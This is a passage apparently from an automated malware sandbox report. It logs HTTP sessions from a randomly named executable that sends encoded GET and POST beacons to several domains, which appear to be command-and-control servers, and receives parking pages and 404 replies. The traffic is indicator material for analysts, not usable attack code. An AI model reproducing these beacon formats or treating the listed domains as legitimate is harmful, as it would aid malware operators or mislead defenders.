hZBc2+LvltCxnBzl0wWR3PvCjDhUjsJmo4cbuHcKPA5GsEG8kL1Jq5TbWn5/TfbjHAIwG+SrP4ijR3MHxVpAyB2JNCAC7UmOFU6HWAXigqHwG4 [TRUNCATED]
Oct 22, 2024 05:40:05.254085064 CEST	1236	IN	HTTP/1.1 200 OK date: Tue, 22 Oct 2024 03:40:04 GMT content-type: text/html; charset=utf-8 content-length: 1134 x-request-id: 640c0049-4bf7-43a6-9ba0-4addf25702cd cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rmNXdjFBPmqu8RpzuIRHCchRiJWUUT289Shovg/LwpqGdXuwaoGR+EO8Q7vhA1dR+92sI/rUNN/iWWY3Xz4rqQ== set-cookie: parking_session=640c0049-4bf7-43a6-9ba0-4addf25702cd; expires=Tue, 22 Oct 2024 03:55:05 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 6d 4e 58 64 6a 46 42 50 6d 71 75 38 52 70 7a 75 49 52 48 43 63 68 52 69 4a 57 55 55 54 32 38 39 53 68 6f 76 67 2f 4c 77 70 71 47 64 58 75 77 61 6f 47 52 2b 45 4f 38 51 37 76 68 41 31 64 52 2b 39 32 73 49 2f 72 55 4e 4e 2f 69 57 57 59 33 58 7a 34 72 71 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rmNXdjFBPmqu8RpzuIRHCchRiJWUUT289Shovg/LwpqGdXuwaoGR+EO8Q7vhA1dR+92sI/rUNN/iWWY3Xz4rqQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 22, 2024 05:40:05.254111052 CEST	587	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjQwYzAwNDktNGJmNy00M2E2LTliYTAtNGFkZGYyNTcwMmNkIiwicGFnZV90aW1lIjoxNzI5NTY4ND

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49992	199.59.243.227	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:40:07.178186893 CEST	410	OUT	GET /rul7/?kT9p=IsmUDGhGjZ2KRgAKfB1HvhyyLqsJdQP3pRKzZVZQCTxvTYvFu3rbLrLYLQVbGlcBi+aKp17AAiqCJ8w25lZIlYoTQ+zVINLm/1UHvGbwh9Y2v06871qB8K3SuXDNUGwH3DJAZfI=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.polarmuseum.info Connection: close User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
Oct 22, 2024 05:40:07.806710958 CEST	1236	IN	HTTP/1.1 200 OK date: Tue, 22 Oct 2024 03:40:06 GMT content-type: text/html; charset=utf-8 content-length: 1526 x-request-id: a4688cc9-93e8-4232-9867-4a5ca3b2c163 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_sACFLjaLOEFJc/49fchXBg+xdraI8I2hTEbyHhaOZP1YxwL+Jkk53taNPFZhh6PXCsKf/hvemf5BbwcSHEUXMQ== set-cookie: parking_session=a4688cc9-93e8-4232-9867-4a5ca3b2c163; expires=Tue, 22 Oct 2024 03:55:07 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 73 41 43 46 4c 6a 61 4c 4f 45 46 4a 63 2f 34 39 66 63 68 58 42 67 2b 78 64 72 61 49 38 49 32 68 54 45 62 79 48 68 61 4f 5a 50 31 59 78 77 4c 2b 4a 6b 6b 35 33 74 61 4e 50 46 5a 68 68 36 50 58 43 73 4b 66 2f 68 76 65 6d 66 35 42 62 77 63 53 48 45 55 58 4d 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_sACFLjaLOEFJc/49fchXBg+xdraI8I2hTEbyHhaOZP1YxwL+Jkk53taNPFZhh6PXCsKf/hvemf5BbwcSHEUXMQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 22, 2024 05:40:07.806770086 CEST	979	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTQ2ODhjYzktOTNlOC00MjMyLTk4NjctNGE1Y2EzYjJjMTYzIiwicGFnZV90aW1lIjoxNzI5NTY4ND

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	49993	162.213.249.216	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:40:12.850466967 CEST	659	OUT	POST /w48t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.tophcom.online Origin: http://www.tophcom.online Connection: close Cache-Control: no-cache Content-Length: 209 Content-Type: application/x-www-form-urlencoded Referer: http://www.tophcom.online/w48t/ User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14 Data Raw: 6b 54 39 70 3d 75 4c 33 65 74 44 69 47 49 75 44 53 66 66 58 6a 35 77 46 35 39 38 32 49 71 31 55 6c 56 54 52 73 58 45 75 38 78 34 49 70 4b 4d 68 43 67 6a 50 39 6e 47 70 48 51 6c 30 2b 6a 76 62 37 30 53 4f 67 4f 56 56 64 58 39 72 62 69 42 2f 42 66 55 42 6b 4c 2f 71 33 30 73 4a 49 76 67 64 2b 44 73 79 47 4e 75 2f 57 56 57 57 77 64 71 34 30 78 72 76 57 39 63 34 48 57 49 4a 69 6f 73 45 57 61 66 6c 37 52 39 69 4f 4e 72 6c 72 39 6a 4b 42 50 45 68 44 45 76 62 43 48 6b 63 63 37 77 44 31 59 72 64 52 71 43 6f 4d 51 36 42 6e 62 39 6b 33 69 61 78 46 56 79 44 2b 51 6d 39 4c 55 4e 6a 53 71 61 71 39 5a 50 35 72 53 4d 5a 72 39 74 2f 34 Data Ascii: kT9p=uL3etDiGIuDSffXj5wF5982Iq1UlVTRsXEu8x4IpKMhCgjP9nGpHQl0+jvb70SOgOVVdX9rbiB/BfUBkL/q30sJIvgd+DsyGNu/WVWWwdq40xrvW9c4HWIJiosEWafl7R9iONrlr9jKBPEhDEvbCHkcc7wD1YrdRqCoMQ6Bnb9k3iaxFVyD+Qm9LUNjSqaq9ZP5rSMZr9t/4
Oct 22, 2024 05:40:13.554639101 CEST	533	IN	HTTP/1.1 404 Not Found Date: Tue, 22 Oct 2024 03:40:13 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	49994	162.213.249.216	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:40:15.404201984 CEST	683	OUT	POST /w48t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.tophcom.online Origin: http://www.tophcom.online Connection: close Cache-Control: no-cache Content-Length: 233 Content-Type: application/x-www-form-urlencoded Referer: http://www.tophcom.online/w48t/ User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14 Data Raw: 6b 54 39 70 3d 75 4c 33 65 74 44 69 47 49 75 44 53 65 2b 6e 6a 37 58 78 35 36 63 32 58 6c 56 55 6c 65 7a 51 6e 58 45 69 38 78 38 77 35 4b 5a 4a 43 67 42 58 39 6b 48 70 48 56 6c 30 2b 73 50 62 2b 33 69 4f 37 4f 56 59 67 58 39 48 62 69 48 54 42 66 52 39 6b 4c 6f 65 77 32 38 4a 47 70 67 64 34 4e 4d 79 47 4e 75 2f 57 56 57 43 61 64 71 67 30 79 62 66 57 79 59 55 45 4b 59 49 51 2f 63 45 57 65 66 6c 2f 52 39 69 77 4e 71 35 52 39 6c 4f 42 50 47 4a 44 45 39 7a 64 4a 55 63 67 31 51 43 74 63 59 41 2b 73 69 5a 53 4d 6f 52 35 4e 75 38 31 71 4d 77 66 4a 42 44 64 43 32 64 4a 55 50 37 67 71 36 71 58 62 50 42 72 41 62 56 4d 79 5a 61 62 59 43 46 32 4a 6e 4f 75 7a 74 2b 30 6a 2b 75 52 6b 7a 33 62 4a 51 3d 3d Data Ascii: kT9p=uL3etDiGIuDSe+nj7Xx56c2XlVUlezQnXEi8x8w5KZJCgBX9kHpHVl0+sPb+3iO7OVYgX9HbiHTBfR9kLoew28JGpgd4NMyGNu/WVWCadqg0ybfWyYUEKYIQ/cEWefl/R9iwNq5R9lOBPGJDE9zdJUcg1QCtcYA+siZSMoR5Nu81qMwfJBDdC2dJUP7gq6qXbPBrAbVMyZabYCF2JnOuzt+0j+uRkz3bJQ==
Oct 22, 2024 05:40:16.082892895 CEST	533	IN	HTTP/1.1 404 Not Found Date: Tue, 22 Oct 2024 03:40:15 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	49995	162.213.249.216	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:40:17.958930016 CEST	1696	OUT	POST /w48t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.tophcom.online Origin: http://www.tophcom.online Connection: close Cache-Control: no-cache Content-Length: 1245 Content-Type: application/x-www-form-urlencoded Referer: http://www.tophcom.online/w48t/ User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14 Data Raw: 6b 54 39 70 3d 75 4c 33 65 74 44 69 47 49 75 44 53 65 2b 6e 6a 37 58 78 35 36 63 32 58 6c 56 55 6c 65 7a 51 6e 58 45 69 38 78 38 77 35 4b 5a 52 43 6a 30 44 39 6d 6b 42 48 57 6c 30 2b 79 2f 62 2f 33 69 50 72 4f 56 78 72 58 39 37 68 69 45 6e 42 65 7a 46 6b 65 71 32 77 73 73 4a 47 6b 41 64 35 44 73 7a 53 4e 76 50 53 56 57 53 61 64 71 67 30 79 64 37 57 32 4d 34 45 61 6f 4a 69 6f 73 45 4b 61 66 6b 61 52 39 36 67 4e 71 38 75 39 55 79 42 50 6d 35 44 49 75 62 64 4c 30 63 59 79 51 43 2b 63 59 4d 68 73 68 74 67 4d 74 74 44 4e 73 67 31 36 74 56 42 52 43 36 45 54 6d 31 76 44 74 54 47 6b 39 66 6b 65 73 35 46 50 37 4a 44 7a 36 36 51 5a 6b 34 74 4c 6b 37 44 7a 4d 50 42 67 4b 57 50 77 6e 62 56 58 31 4b 48 4d 46 47 6c 2f 44 7a 6d 76 4b 68 79 52 42 73 76 7a 36 72 57 6f 58 48 32 74 34 6c 44 67 43 56 42 77 4a 58 64 35 6e 59 4f 72 33 5a 50 32 37 5a 37 2f 55 62 49 6c 52 37 6b 38 4f 74 4c 51 33 54 62 6a 75 5a 7a 4e 41 6e 7a 56 79 6d 70 56 4c 4f 67 78 6a 48 47 35 53 32 4c 6a 6a 58 48 51 4a 6d 56 2b 34 31 78 79 72 45 70 58 [TRUNCATED] Data Ascii: kT9p=uL3etDiGIuDSe+nj7Xx56c2XlVUlezQnXEi8x8w5KZRCj0D9mkBHWl0+y/b/3iPrOVxrX97hiEnBezFkeq2wssJGkAd5DszSNvPSVWSadqg0yd7W2M4EaoJiosEKafkaR96gNq8u9UyBPm5DIubdL0cYyQC+cYMhshtgMttDNsg16tVBRC6ETm1vDtTGk9fkes5FP7JDz66QZk4tLk7DzMPBgKWPwnbVX1KHMFGl/DzmvKhyRBsvz6rWoXH2t4lDgCVBwJXd5nYOr3ZP27Z7/UbIlR7k8OtLQ3TbjuZzNAnzVympVLOgxjHG5S2LjjXHQJmV+41xyrEpXDbUXUADmod046yHaP/Yo8qFEHazAZrBA+gmhvAfGmCH9o8RXmNsx+X8mho0HSjw+d5svijw3OOp3CRTX3CVHyWXNWO3kuy/wP836Ckw8FZeB3+BXtOb65w2eJeyAkedjcbqOR4qcMYWsmT5r7s7fNAuvbWRYQTPobxqGBBq8l4qHRwuC1Al8qgm3lqGiFlu92vpekpjsrtw1Gkam/vUCelZ4l60cgMya459PIX76ldXxvfjWsFdRyKSvfLPFYhJr54GcJKcWFpg+6fU9ntdOpMvoDYY7iuH7g4OOPA6OeWIw1TDVO7fohx1O01KpvJ37oE7mPctEar79+x495fSdvWJqpr6z9WfcY3G1pM8liiUmTDFkXkSYC2Z8z2+LTQKCJhEdtz/gRV3sGPhxR5WOftNE7U6354r7pU7ImOC6T7s+dha1qIkQ7NitUX1Z8aIIhOj/HW/e/j9oIyEdDvnQUtZNqIux2o/ggdnx4zmJ7f8KTRGI/XfTHSu7lC0BJsDkhpV36imxHMgIJ1D/JlKbCK3sdZW9KJozbdZBsDOduV2VWoi/vuoLAFraKEm0tnpn1zL0ypfJXvA2n88x19PTahcmD+owr1V23gXAvC4qw1AMUYjXmCzYyMf7pW0QhkYNqWrwOFJeEFWxkizYCUpmQjSU3JTexEgEdS [TRUNCATED]
Oct 22, 2024 05:40:18.649277925 CEST	533	IN	HTTP/1.1 404 Not Found Date: Tue, 22 Oct 2024 03:40:18 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	49996	162.213.249.216	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:40:20.504648924 CEST	408	OUT	GET /w48t/?in1Hf=rx3dZnMxlRvDbR&kT9p=jJf+uzLSIbfTebLlnllI962yuVk8Hw4tbleG5p05VL9UtkahhFlDUVJutvL9vCK8DEN3aeTkpXm8VBxSWq3LxvJEsjtiOsjWB/GCZl2Odas12ant1owrZYZ7neQtVdJoZOGoB8U= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.tophcom.online Connection: close User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
Oct 22, 2024 05:40:21.178417921 CEST	548	IN	HTTP/1.1 404 Not Found Date: Tue, 22 Oct 2024 03:40:21 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	49997	221.121.144.149	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:40:27.542023897 CEST	674	OUT	POST /3ycg/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.inf30027group23.xyz Origin: http://www.inf30027group23.xyz Connection: close Cache-Control: no-cache Content-Length: 209 Content-Type: application/x-www-form-urlencoded Referer: http://www.inf30027group23.xyz/3ycg/ User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14 Data Raw: 6b 54 39 70 3d 6b 42 7a 64 33 6b 6a 45 67 66 77 75 4b 39 58 7a 4b 2b 62 78 77 44 6e 54 52 79 53 62 47 54 59 30 35 4a 4c 52 42 78 54 4a 6a 53 4f 37 4f 5a 51 71 30 48 70 41 54 43 72 66 33 59 70 2f 77 37 4e 4c 35 4d 5a 59 69 36 44 56 6c 4f 4a 48 65 53 6c 2b 58 64 77 67 77 46 41 45 57 61 72 62 66 79 6a 65 59 68 2f 38 54 61 5a 56 37 63 59 63 2b 54 66 63 71 71 45 39 2f 72 7a 32 5a 75 69 67 6e 35 6f 4f 6c 59 2f 54 32 51 59 52 52 70 55 5a 72 33 41 43 77 47 4c 63 49 6b 4d 6f 42 41 4e 37 35 7a 63 74 6c 31 2f 69 36 2b 44 48 57 4b 70 51 49 2f 69 54 43 68 32 47 62 37 58 32 76 41 36 34 36 56 53 75 5a 46 63 67 6c 4b 35 69 46 7a 43 56 Data Ascii: kT9p=kBzd3kjEgfwuK9XzK+bxwDnTRySbGTY05JLRBxTJjSO7OZQq0HpATCrf3Yp/w7NL5MZYi6DVlOJHeSl+XdwgwFAEWarbfyjeYh/8TaZV7cYc+TfcqqE9/rz2Zuign5oOlY/T2QYRRpUZr3ACwGLcIkMoBAN75zctl1/i6+DHWKpQI/iTCh2Gb7X2vA646VSuZFcglK5iFzCV

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
